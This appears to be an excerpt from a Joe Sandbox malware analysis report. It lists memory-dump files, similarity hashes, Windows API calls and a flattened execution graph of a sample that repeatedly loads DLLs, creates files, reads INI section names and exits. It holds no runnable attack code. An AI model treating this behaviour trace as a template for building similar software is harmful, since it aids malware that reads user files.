                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                • String ID: C:\Program Files (x86)\E6l40hhe
                                                                                                                                                                                                                                • API String ID: 2709904686-3393615557
                                                                                                                                                                                                                                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000001E.00000002.4673126984.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673058067.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673235120.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673311494.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673578217.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673668876.000000000042F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673763150.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673870503.0000000000436000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4673962510.0000000000440000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674080288.000000000044D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000001E.00000002.4674539159.0000000000493000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_30_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:7.6%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:1.5%
                                                                                                                                                                                                                                Total number of Nodes:735
                                                                                                                                                                                                                                Total number of Limit Nodes:24
                                                                                                                                                                                                                                execution_graph 5403 244a2276b69 5406 244a2276b6e 5403->5406 5404 244a227b412 LdrLoadDll 5405 244a2276c35 5404->5405 5407 244a22794e2 LdrLoadDll 5406->5407 5408 244a2276c18 5406->5408 5407->5408 5408->5404 5142 244a22783e6 5143 244a2278434 5142->5143 5144 244a227841b 5142->5144 5145 244a227b412 LdrLoadDll 5144->5145 5145->5143 5571 244a22734b3 5572 244a227352a 5571->5572 5573 244a22794e2 LdrLoadDll 5572->5573 5574 244a227353a 5573->5574 5575 244a22794e2 LdrLoadDll 5574->5575 5586 244a227361b 5574->5586 5576 244a227355e 5575->5576 5577 244a227b412 LdrLoadDll 5576->5577 5576->5586 5578 244a2273587 5577->5578 5579 244a227b412 LdrLoadDll 5578->5579 5580 244a22735ab 5579->5580 5581 244a227b412 LdrLoadDll 5580->5581 5582 244a22735cf 5581->5582 5583 244a227b412 LdrLoadDll 5582->5583 5584 244a22735f7 5583->5584 5585 244a227b412 LdrLoadDll 5584->5585 5585->5586 5146 244a227d8e5 5147 244a227d8f7 5146->5147 5150 244a227d6f2 5147->5150 5149 244a227d8fc 5153 244a227c762 5150->5153 5152 244a227d707 5152->5149 5154 244a227c76b 5153->5154 5155 244a227c770 5154->5155 5159 244a227c77c 5154->5159 5156 244a2279f12 LdrLoadDll 5155->5156 5157 244a227c775 5156->5157 5157->5152 5158 244a227c8fa 5158->5152 5159->5158 5160 244a22780a2 LdrLoadDll 5159->5160 5161 244a227c7dc 5160->5161 5161->5158 5162 244a2274362 LdrLoadDll 5161->5162 5163 244a227c7ec 5162->5163 5163->5158 5164 244a227c80d 5163->5164 5166 244a227c81a 5163->5166 5167 244a227c815 5163->5167 5165 244a227a8a2 LdrLoadDll 5164->5165 5165->5167 5166->5167 5168 244a22734b2 LdrLoadDll 5166->5168 5167->5158 5171 244a2276812 3 API calls 5167->5171 5169 244a227c835 5168->5169 5170 244a227a8a2 LdrLoadDll 5169->5170 5172 244a227c83d 5170->5172 5173 244a227c8d9 5171->5173 5174 244a227c894 5172->5174 5178 244a227c85f 5172->5178 5175 244a227b412 LdrLoadDll 5173->5175 5177 244a2273372 LdrLoadDll 5174->5177 5176 244a227c8f6 ExitProcess 5175->5176 5177->5167 5179 244a22794e2 LdrLoadDll 5178->5179 5180 244a227c872 5179->5180 5180->5152 5409 244a2273272 5410 244a227b412 LdrLoadDll 5409->5410 5412 244a22732aa 5410->5412 5411 244a227334e 5412->5411 5415 244a22730f2 LdrLoadDll 5412->5415 5416 244a2273cb2 5412->5416 5430 244a227a5b2 5412->5430 5415->5412 5417 244a2273cdb 5416->5417 5429 244a2273d49 5416->5429 5418 244a227ad02 2 API calls 5417->5418 5417->5429 5419 244a2273d16 5418->5419 5420 244a2273d45 5419->5420 5436 244a2273902 5419->5436 5421 244a227ad02 2 API calls 5420->5421 5420->5429 5425 244a2273d6a 5421->5425 5423 244a2273d36 5423->5420 5445 244a22737d2 5423->5445 5426 244a22794e2 LdrLoadDll 5425->5426 5425->5429 5427 244a2273dd0 5426->5427 5428 244a227b412 LdrLoadDll 5427->5428 5428->5429 5429->5412 5432 244a227a5e8 5430->5432 5431 244a227a648 5434 244a227ba52 LdrLoadDll 5431->5434 5435 244a227a6a9 5431->5435 5432->5431 5433 244a227ba52 LdrLoadDll 5432->5433 5433->5432 5434->5431 5435->5412 5437 244a2273ca0 5436->5437 5438 244a227392a 5436->5438 5437->5423 5438->5437 5439 244a227ad02 2 API calls 5438->5439 5440 244a2273a79 5439->5440 5441 244a227ad02 2 API calls 5440->5441 5444 244a2273c5f 5440->5444 5442 244a2273c49 5441->5442 5443 244a227ad02 2 API calls 5442->5443 5443->5444 5444->5423 5446 244a2273804 5445->5446 5447 244a22737f0 5445->5447 5448 244a227ad02 2 API calls 5446->5448 5447->5420 5449 244a22738c6 5448->5449 5449->5420 5181 244a227d6e8 5182 244a227d707 5181->5182 5183 244a227c762 4 API calls 5181->5183 5183->5182 5587 244a2273caf 5588 244a2273cdb 5587->5588 5594 244a2273d49 5587->5594 5589 244a227ad02 2 API calls 5588->5589 5588->5594 5590 244a2273d16 5589->5590 5592 244a2273902 2 API calls 5590->5592 5597 244a2273d45 5590->5597 5591 244a227ad02 2 API calls 5593 244a2273d6a 5591->5593 5595 244a2273d36 5592->5595 5593->5594 5598 244a22794e2 LdrLoadDll 5593->5598 5596 244a22737d2 2 API calls 5595->5596 5595->5597 5596->5597 5597->5591 5597->5594 5599 244a2273dd0 5598->5599 5600 244a227b412 LdrLoadDll 5599->5600 5600->5594 5184 244a22730ee 5185 244a22731af 5184->5185 5186 244a2273109 5184->5186 5190 244a2273012 5186->5190 5188 244a2273118 5194 244a227ba52 5188->5194 5191 244a2273031 5190->5191 5192 244a22730cd 5191->5192 5193 244a227ba52 LdrLoadDll 5191->5193 5192->5188 5193->5192 5196 244a227ba85 5194->5196 5195 244a227baef 5195->5185 5196->5195 5197 244a227bb4e 5196->5197 5211 244a2278452 5196->5211 5197->5195 5200 244a227b412 LdrLoadDll 5197->5200 5201 244a227bbaa 5197->5201 5199 244a227bc51 5204 244a227bc8d 5199->5204 5219 244a22785d2 5199->5219 5200->5201 5201->5195 5201->5199 5215 244a22783f2 5201->5215 5205 244a227c28c 5204->5205 5206 244a227c2d4 5204->5206 5223 244a2278652 5205->5223 5227 244a2278552 5206->5227 5209 244a2278652 LdrLoadDll 5209->5195 5210 244a227c2fc 5210->5209 5212 244a22784a3 5211->5212 5213 244a227848c 5211->5213 5212->5197 5214 244a227b412 LdrLoadDll 5213->5214 5214->5212 5216 244a227841b 5215->5216 5218 244a2278434 5215->5218 5217 244a227b412 LdrLoadDll 5216->5217 5217->5218 5218->5199 5220 244a227860a 5219->5220 5222 244a2278621 5219->5222 5221 244a227b412 LdrLoadDll 5220->5221 5221->5222 5222->5204 5224 244a227869d 5223->5224 5225 244a2278684 5223->5225 5224->5195 5226 244a227b412 LdrLoadDll 5225->5226 5226->5224 5228 244a2278559 5227->5228 5229 244a227859e 5228->5229 5230 244a227b412 LdrLoadDll 5228->5230 5229->5210 5230->5229 5454 244a2273f6e 5455 244a2273f91 5454->5455 5458 244a2273faa 5454->5458 5456 244a22730f2 LdrLoadDll 5455->5456 5457 244a2273f99 5456->5457 5231 244a22738fb 5232 244a2273ca0 5231->5232 5233 244a227392a 5231->5233 5233->5232 5234 244a227ad02 2 API calls 5233->5234 5236 244a2273a79 5234->5236 5235 244a2273c5f 5236->5235 5237 244a227ad02 2 API calls 5236->5237 5238 244a2273c49 5237->5238 5239 244a227ad02 2 API calls 5238->5239 5239->5235 5331 244a227a73b 5332 244a2279672 LdrLoadDll 5331->5332 5333 244a227a7ba 5332->5333 5334 244a227b637 5336 244a227b538 5334->5336 5338 244a227b63f 5334->5338 5335 244a227b53d 5336->5335 5337 244a227b982 LdrLoadDll 5336->5337 5337->5335 5339 244a227b6e2 5338->5339 5340 244a22794e2 LdrLoadDll 5338->5340 5341 244a227b71d 5340->5341 5341->5339 5343 244a227ca32 LdrLoadDll 5341->5343 5344 244a227b783 5341->5344 5342 244a227b801 5343->5344 5344->5342 5345 244a227b982 LdrLoadDll 5344->5345 5345->5342 5601 244a2275dc3 5604 244a2275e0f 5601->5604 5602 244a2275f1f 5603 244a2275b22 2 API calls 5602->5603 5607 244a2275f12 5603->5607 5604->5602 5605 244a2275ece 5604->5605 5606 244a2275b22 2 API calls 5605->5606 5606->5607 5459 244a2275a81 5460 244a22734b2 LdrLoadDll 5459->5460 5461 244a2275a94 5460->5461 5470 244a22775e2 5461->5470 5464 244a22730f2 LdrLoadDll 5465 244a2275aa4 5464->5465 5466 244a227b412 LdrLoadDll 5465->5466 5468 244a2275af1 5466->5468 5467 244a2275b17 5468->5467 5476 244a22731c2 5468->5476 5471 244a2277623 5470->5471 5472 244a2277492 LdrLoadDll 5471->5472 5473 244a2277698 5472->5473 5474 244a22784d2 LdrLoadDll 5473->5474 5475 244a2275a9c 5474->5475 5475->5464 5477 244a2273267 5476->5477 5478 244a22731df 5476->5478 5477->5468 5479 244a2273cb2 2 API calls 5478->5479 5480 244a2273208 5478->5480 5479->5480 5480->5477 5481 244a227a5b2 LdrLoadDll 5480->5481 5482 244a227325f 5481->5482 5483 244a22730f2 LdrLoadDll 5482->5483 5483->5477 5240 244a2275100 5241 244a227512d 5240->5241 5242 244a22780a2 LdrLoadDll 5241->5242 5243 244a227514a 5242->5243 5244 244a22794e2 LdrLoadDll 5243->5244 5247 244a22751bb 5243->5247 5245 244a227519b 5244->5245 5246 244a227b412 LdrLoadDll 5245->5246 5246->5247 5346 244a227ac40 5347 244a227ac5c 5346->5347 5348 244a227b412 LdrLoadDll 5347->5348 5351 244a227acb0 5347->5351 5349 244a227ac87 5348->5349 5350 244a227b412 LdrLoadDll 5349->5350 5350->5351 5484 244a227b980 5485 244a227b642 LdrLoadDll 5484->5485 5486 244a227b997 5484->5486 5485->5486 5487 244a227b412 LdrLoadDll 5486->5487 5488 244a227ba11 5486->5488 5487->5488 5248 244a22762ff 5249 244a227631b 5248->5249 5250 244a2276496 5248->5250 5249->5250 5251 244a227b412 LdrLoadDll 5249->5251 5252 244a2276343 5251->5252 5253 244a227b412 LdrLoadDll 5252->5253 5254 244a2276360 5253->5254 5255 244a227b412 LdrLoadDll 5254->5255 5256 244a227637d 5255->5256 5257 244a227b412 LdrLoadDll 5256->5257 5258 244a227639a 5257->5258 5259 244a227b412 LdrLoadDll 5258->5259 5260 244a22763b7 5259->5260 5261 244a227b412 LdrLoadDll 5260->5261 5262 244a22763d4 5261->5262 5263 244a227b412 LdrLoadDll 5262->5263 5264 244a22763f1 5263->5264 5265 244a227b412 LdrLoadDll 5264->5265 5266 244a227640e 5265->5266 5267 244a227b412 LdrLoadDll 5266->5267 5268 244a227642b 5267->5268 5269 244a227b412 LdrLoadDll 5268->5269 5270 244a2276448 5269->5270 5271 244a227b412 LdrLoadDll 5270->5271 5272 244a2276465 5271->5272 5273 244a227b412 LdrLoadDll 5272->5273 5274 244a2276482 5273->5274 5608 244a22731bf 5609 244a2273267 5608->5609 5610 244a22731df 5608->5610 5611 244a2273cb2 2 API calls 5610->5611 5612 244a2273208 5610->5612 5611->5612 5612->5609 5613 244a227a5b2 LdrLoadDll 5612->5613 5614 244a227325f 5613->5614 5615 244a22730f2 LdrLoadDll 5614->5615 5615->5609 5352 244a2279f06 5353 244a2279f3b 5352->5353 5354 244a22780a2 LdrLoadDll 5353->5354 5355 244a2279f44 5354->5355 5356 244a227b412 LdrLoadDll 5355->5356 5384 244a227a422 5355->5384 5357 244a2279fe5 5356->5357 5358 244a227b412 LdrLoadDll 5357->5358 5359 244a227a00d 5358->5359 5360 244a227b412 LdrLoadDll 5359->5360 5359->5384 5361 244a227a052 5360->5361 5362 244a227b412 LdrLoadDll 5361->5362 5363 244a227a0af 5362->5363 5364 244a227a0bf 5363->5364 5365 244a227b412 LdrLoadDll 5363->5365 5366 244a227a132 5365->5366 5366->5364 5367 244a227a1ab 5366->5367 5368 244a227a160 5366->5368 5369 244a227b412 LdrLoadDll 5367->5369 5371 244a2279cb2 LdrLoadDll 5368->5371 5370 244a227a1cc 5369->5370 5373 244a227a1dd 5370->5373 5374 244a227b412 LdrLoadDll 5370->5374 5372 244a227a19f 5371->5372 5375 244a227a22a 5374->5375 5376 244a227b412 LdrLoadDll 5375->5376 5377 244a227a25a 5376->5377 5378 244a227a335 5377->5378 5379 244a2274b22 LdrLoadDll 5377->5379 5381 244a227a2e2 5377->5381 5380 244a2279a82 LdrLoadDll 5378->5380 5379->5378 5380->5381 5382 244a227b412 LdrLoadDll 5381->5382 5385 244a227a376 5381->5385 5382->5385 5383 244a227b412 LdrLoadDll 5383->5384 5385->5383 5279 244a22737ce 5280 244a22737f0 5279->5280 5281 244a2273804 5279->5281 5282 244a227ad02 2 API calls 5281->5282 5283 244a22738c6 5282->5283 5386 244a227d909 5387 244a227d90e 5386->5387 5388 244a227d6f2 4 API calls 5387->5388 5389 244a227d913 5388->5389 5620 244a227c98a 5621 244a227c9b3 5620->5621 5622 244a227c9a6 5620->5622 5623 244a227b412 LdrLoadDll 5621->5623 5624 244a227c9c9 5623->5624 5624->5622 5625 244a227b412 LdrLoadDll 5624->5625 5625->5622 5390 244a227b40c 5391 244a227b62b 5390->5391 5393 244a227b437 5390->5393 5392 244a227b44e 5393->5392 5394 244a227b982 LdrLoadDll 5393->5394 5394->5392 5497 244a2274359 5498 244a227436b 5497->5498 5499 244a22794e2 LdrLoadDll 5498->5499 5534 244a2274843 5498->5534 5500 244a22744b3 5499->5500 5501 244a227b412 LdrLoadDll 5500->5501 5502 244a22744d7 5501->5502 5503 244a227b412 LdrLoadDll 5502->5503 5504 244a22744ff 5503->5504 5505 244a227b412 LdrLoadDll 5504->5505 5504->5534 5506 244a227454a 5505->5506 5507 244a22794e2 LdrLoadDll 5506->5507 5506->5534 5508 244a22745a1 5507->5508 5509 244a22794e2 LdrLoadDll 5508->5509 5510 244a22745b9 5509->5510 5511 244a227b412 LdrLoadDll 5510->5511 5512 244a22745e6 5511->5512 5513 244a227b412 LdrLoadDll 5512->5513 5514 244a2274613 5513->5514 5515 244a227b412 LdrLoadDll 5514->5515 5514->5534 5516 244a227464e 5515->5516 5517 244a227c992 LdrLoadDll 5516->5517 5518 244a2274662 5517->5518 5519 244a2279672 LdrLoadDll 5518->5519 5518->5534 5520 244a2274713 5519->5520 5521 244a227b412 LdrLoadDll 5520->5521 5522 244a227476e 5521->5522 5523 244a227b412 LdrLoadDll 5522->5523 5524 244a2274792 5523->5524 5525 244a227b412 LdrLoadDll 5524->5525 5526 244a22747b6 5525->5526 5527 244a227b412 LdrLoadDll 5526->5527 5528 244a22747da 5527->5528 5529 244a227b412 LdrLoadDll 5528->5529 5530 244a22747fe 5529->5530 5531 244a227b412 LdrLoadDll 5530->5531 5532 244a227482f 5531->5532 5533 244a227c992 LdrLoadDll 5532->5533 5533->5534 5395 244a2274b17 5397 244a2274b09 5395->5397 5396 244a2274b0e 5397->5396 5398 244a22749c2 LdrLoadDll 5397->5398 5399 244a2274c3f 5398->5399 5399->5396 5400 244a22749c2 LdrLoadDll 5399->5400 5401 244a2274c54 5400->5401 5401->5396 5402 244a22749c2 LdrLoadDll 5401->5402 5402->5396 5626 244a2278096 5627 244a22780d8 5626->5627 5628 244a227b412 LdrLoadDll 5627->5628 5629 244a2278167 5628->5629 4805 244a227c762 4806 244a227c76b 4805->4806 4807 244a227c770 4806->4807 4811 244a227c77c 4806->4811 4899 244a2279f12 4807->4899 4809 244a227c775 4810 244a227c8fa 4811->4810 4833 244a22780a2 4811->4833 4813 244a227c7dc 4813->4810 4837 244a2274362 4813->4837 4816 244a227c80d 4933 244a227a8a2 4816->4933 4818 244a227c81a 4819 244a227c815 4818->4819 4954 244a22734b2 4818->4954 4819->4810 4875 244a2276812 4819->4875 4821 244a227c835 4822 244a227a8a2 LdrLoadDll 4821->4822 4824 244a227c83d 4822->4824 4826 244a227c894 4824->4826 4830 244a227c85f 4824->4830 4975 244a2273372 4826->4975 4828 244a227c8f6 ExitProcess 4970 244a22794e2 4830->4970 4832 244a227c872 4834 244a22780d8 4833->4834 4835 244a227b412 LdrLoadDll 4834->4835 4836 244a2278167 4835->4836 4836->4813 4838 244a2274394 4837->4838 4839 244a22794e2 LdrLoadDll 4838->4839 4874 244a2274843 4838->4874 4840 244a22744b3 4839->4840 4841 244a227b412 LdrLoadDll 4840->4841 4842 244a22744d7 4841->4842 4843 244a227b412 LdrLoadDll 4842->4843 4844 244a22744ff 4843->4844 4845 244a227b412 LdrLoadDll 4844->4845 4844->4874 4846 244a227454a 4845->4846 4847 244a22794e2 LdrLoadDll 4846->4847 4846->4874 4848 244a22745a1 4847->4848 4849 244a22794e2 LdrLoadDll 4848->4849 4850 244a22745b9 4849->4850 4851 244a227b412 LdrLoadDll 4850->4851 4852 244a22745e6 4851->4852 4853 244a227b412 LdrLoadDll 4852->4853 4854 244a2274613 4853->4854 4855 244a227b412 LdrLoadDll 4854->4855 4854->4874 4856 244a227464e 4855->4856 4978 244a227c992 4856->4978 4858 244a2274662 4858->4874 4984 244a2279672 4858->4984 4860 244a2274713 4861 244a227b412 LdrLoadDll 4860->4861 4862 244a227476e 4861->4862 4863 244a227b412 LdrLoadDll 4862->4863 4864 244a2274792 4863->4864 4865 244a227b412 LdrLoadDll 4864->4865 4866 244a22747b6 4865->4866 4867 244a227b412 LdrLoadDll 4866->4867 4868 244a22747da 4867->4868 4869 244a227b412 LdrLoadDll 4868->4869 4870 244a22747fe 4869->4870 4871 244a227b412 LdrLoadDll 4870->4871 4872 244a227482f 4871->4872 4873 244a227c992 LdrLoadDll 4872->4873 4873->4874 4874->4810 4874->4816 4874->4818 4874->4819 4876 244a227c992 LdrLoadDll 4875->4876 4877 244a22768c7 4876->4877 4878 244a227c992 LdrLoadDll 4877->4878 4879 244a22768db 4878->4879 4880 244a2276a6f 4879->4880 4881 244a22794e2 LdrLoadDll 4879->4881 4894 244a227b412 4880->4894 4882 244a227691f 4881->4882 4988 244a2276302 4882->4988 4884 244a2276940 4884->4880 4885 244a22794e2 LdrLoadDll 4884->4885 4886 244a22769cf 4885->4886 4886->4880 4887 244a227b412 LdrLoadDll 4886->4887 4888 244a22769f1 4887->4888 4888->4880 5015 244a22764b2 4888->5015 4893 244a227ac42 LdrLoadDll 4893->4880 4895 244a227b62b 4894->4895 4896 244a227b437 4894->4896 4895->4828 4897 244a227b44e 4896->4897 5085 244a227b982 4896->5085 4897->4828 4900 244a2279f3b 4899->4900 4901 244a22780a2 LdrLoadDll 4900->4901 4902 244a2279f44 4901->4902 4903 244a227b412 LdrLoadDll 4902->4903 4931 244a227a422 4902->4931 4904 244a2279fe5 4903->4904 4905 244a227b412 LdrLoadDll 4904->4905 4906 244a227a00d 4905->4906 4907 244a227b412 LdrLoadDll 4906->4907 4906->4931 4908 244a227a052 4907->4908 4909 244a227b412 LdrLoadDll 4908->4909 4911 244a227a0af 4909->4911 4910 244a227a0bf 4910->4809 4911->4910 4912 244a227b412 LdrLoadDll 4911->4912 4913 244a227a132 4912->4913 4913->4910 4914 244a227a1ab 4913->4914 4915 244a227a160 4913->4915 4916 244a227b412 LdrLoadDll 4914->4916 5103 244a2279cb2 4915->5103 4917 244a227a1cc 4916->4917 4920 244a227a1dd 4917->4920 4921 244a227b412 LdrLoadDll 4917->4921 4920->4809 4922 244a227a22a 4921->4922 4923 244a227b412 LdrLoadDll 4922->4923 4924 244a227a25a 4923->4924 4925 244a227a335 4924->4925 4928 244a227a2e2 4924->4928 5115 244a2274b22 4924->5115 5123 244a2279a82 4925->5123 4929 244a227b412 LdrLoadDll 4928->4929 4932 244a227a376 4928->4932 4929->4932 4930 244a227b412 LdrLoadDll 4930->4931 4931->4809 4932->4930 4934 244a227a8cf 4933->4934 4935 244a227ac2c 4934->4935 4936 244a227b412 LdrLoadDll 4934->4936 4935->4819 4937 244a227a92d 4936->4937 4938 244a227b412 LdrLoadDll 4937->4938 4939 244a227a95e 4938->4939 4940 244a227b412 LdrLoadDll 4939->4940 4942 244a227a98f 4940->4942 4941 244a227abeb 4941->4819 4942->4941 5135 244a22797c2 4942->5135 4944 244a227aaf5 5139 244a227a742 4944->5139 4946 244a227ab11 4946->4941 4947 244a227b412 LdrLoadDll 4946->4947 4948 244a227ab60 4947->4948 4949 244a227b412 LdrLoadDll 4948->4949 4950 244a227ab8d 4949->4950 4951 244a227b412 LdrLoadDll 4950->4951 4952 244a227abbc 4951->4952 4953 244a227b412 LdrLoadDll 4952->4953 4953->4941 4955 244a22734b3 4954->4955 4956 244a22794e2 LdrLoadDll 4955->4956 4957 244a227353a 4956->4957 4958 244a22794e2 LdrLoadDll 4957->4958 4969 244a227361b 4957->4969 4959 244a227355e 4958->4959 4960 244a227b412 LdrLoadDll 4959->4960 4959->4969 4961 244a2273587 4960->4961 4962 244a227b412 LdrLoadDll 4961->4962 4963 244a22735ab 4962->4963 4964 244a227b412 LdrLoadDll 4963->4964 4965 244a22735cf 4964->4965 4966 244a227b412 LdrLoadDll 4965->4966 4967 244a22735f7 4966->4967 4968 244a227b412 LdrLoadDll 4967->4968 4968->4969 4969->4821 4972 244a227950a 4970->4972 4971 244a227950e 4971->4832 4972->4971 4973 244a227954a LdrLoadDll 4972->4973 4974 244a2279566 4972->4974 4973->4974 4974->4832 4976 244a227b412 LdrLoadDll 4975->4976 4977 244a22733a0 4976->4977 4977->4819 4979 244a227c9b3 4978->4979 4983 244a227c9a6 4978->4983 4980 244a227b412 LdrLoadDll 4979->4980 4981 244a227c9c9 4980->4981 4982 244a227b412 LdrLoadDll 4981->4982 4981->4983 4982->4983 4983->4858 4985 244a22796a6 4984->4985 4986 244a227b412 LdrLoadDll 4985->4986 4987 244a22796ee 4986->4987 4987->4860 4989 244a2276496 4988->4989 4990 244a227631b 4988->4990 4989->4884 4990->4989 4991 244a227b412 LdrLoadDll 4990->4991 4992 244a2276343 4991->4992 4993 244a227b412 LdrLoadDll 4992->4993 4994 244a2276360 4993->4994 4995 244a227b412 LdrLoadDll 4994->4995 4996 244a227637d 4995->4996 4997 244a227b412 LdrLoadDll 4996->4997 4998 244a227639a 4997->4998 4999 244a227b412 LdrLoadDll 4998->4999 5000 244a22763b7 4999->5000 5001 244a227b412 LdrLoadDll 5000->5001 5002 244a22763d4 5001->5002 5003 244a227b412 LdrLoadDll 5002->5003 5004 244a22763f1 5003->5004 5005 244a227b412 LdrLoadDll 5004->5005 5006 244a227640e 5005->5006 5007 244a227b412 LdrLoadDll 5006->5007 5008 244a227642b 5007->5008 5009 244a227b412 LdrLoadDll 5008->5009 5010 244a2276448 5009->5010 5011 244a227b412 LdrLoadDll 5010->5011 5012 244a2276465 5011->5012 5013 244a227b412 LdrLoadDll 5012->5013 5014 244a2276482 5013->5014 5014->4884 5016 244a2279672 LdrLoadDll 5015->5016 5017 244a22765a9 5016->5017 5018 244a227b412 LdrLoadDll 5017->5018 5019 244a227665b 5018->5019 5020 244a227b412 LdrLoadDll 5019->5020 5021 244a2276681 5020->5021 5022 244a22767f2 5021->5022 5023 244a22766a0 GetPrivateProfileSectionNamesW 5021->5023 5028 244a227ac42 5022->5028 5024 244a22766bd 5023->5024 5034 244a2275b22 5024->5034 5026 244a22766dd 5026->5022 5038 244a2275f62 5026->5038 5029 244a227ac5c 5028->5029 5030 244a227b412 LdrLoadDll 5029->5030 5033 244a2276a60 5029->5033 5031 244a227ac87 5030->5031 5032 244a227b412 LdrLoadDll 5031->5032 5032->5033 5033->4893 5035 244a2275b73 5034->5035 5037 244a2275cda 5035->5037 5047 244a227ad02 5035->5047 5037->5026 5039 244a2275fb0 5038->5039 5040 244a227ad02 2 API calls 5039->5040 5044 244a22760dc 5040->5044 5041 244a22762e2 5041->5026 5042 244a22762c3 5043 244a227ac42 LdrLoadDll 5042->5043 5043->5041 5044->5041 5044->5042 5045 244a2275b22 LdrLoadDll NtCreateFile 5044->5045 5046 244a2275dd2 LdrLoadDll NtCreateFile 5044->5046 5045->5044 5046->5044 5048 244a227b38d 5047->5048 5050 244a227ad2c 5047->5050 5048->5037 5049 244a227adc0 5052 244a227ae04 5049->5052 5053 244a227ae71 5049->5053 5071 244a227ae2f 5049->5071 5050->5048 5050->5049 5051 244a227b412 LdrLoadDll 5050->5051 5051->5049 5055 244a227b412 LdrLoadDll 5052->5055 5052->5071 5056 244a227b412 LdrLoadDll 5053->5056 5059 244a227ae99 5053->5059 5054 244a227aee0 NtCreateFile 5058 244a227ac42 LdrLoadDll 5054->5058 5055->5071 5056->5059 5057 244a227b412 LdrLoadDll 5060 244a227aed0 5057->5060 5061 244a227af2d 5058->5061 5059->5054 5059->5057 5059->5071 5060->5054 5060->5071 5062 244a227b412 LdrLoadDll 5061->5062 5063 244a227af7e 5061->5063 5061->5071 5062->5063 5064 244a227afd0 5063->5064 5065 244a227b02e 5063->5065 5063->5071 5068 244a227b412 LdrLoadDll 5064->5068 5064->5071 5066 244a227b037 5065->5066 5067 244a227b0e6 5065->5067 5066->5071 5075 244a227b412 LdrLoadDll 5066->5075 5069 244a227b188 5067->5069 5070 244a227b0ef 5067->5070 5068->5071 5072 244a227b209 5069->5072 5073 244a227b18d 5069->5073 5074 244a227b117 5070->5074 5076 244a227b412 LdrLoadDll 5070->5076 5071->5037 5077 244a227b294 5072->5077 5078 244a227b212 5072->5078 5073->5071 5080 244a227b412 LdrLoadDll 5073->5080 5074->5071 5079 244a227c992 LdrLoadDll 5074->5079 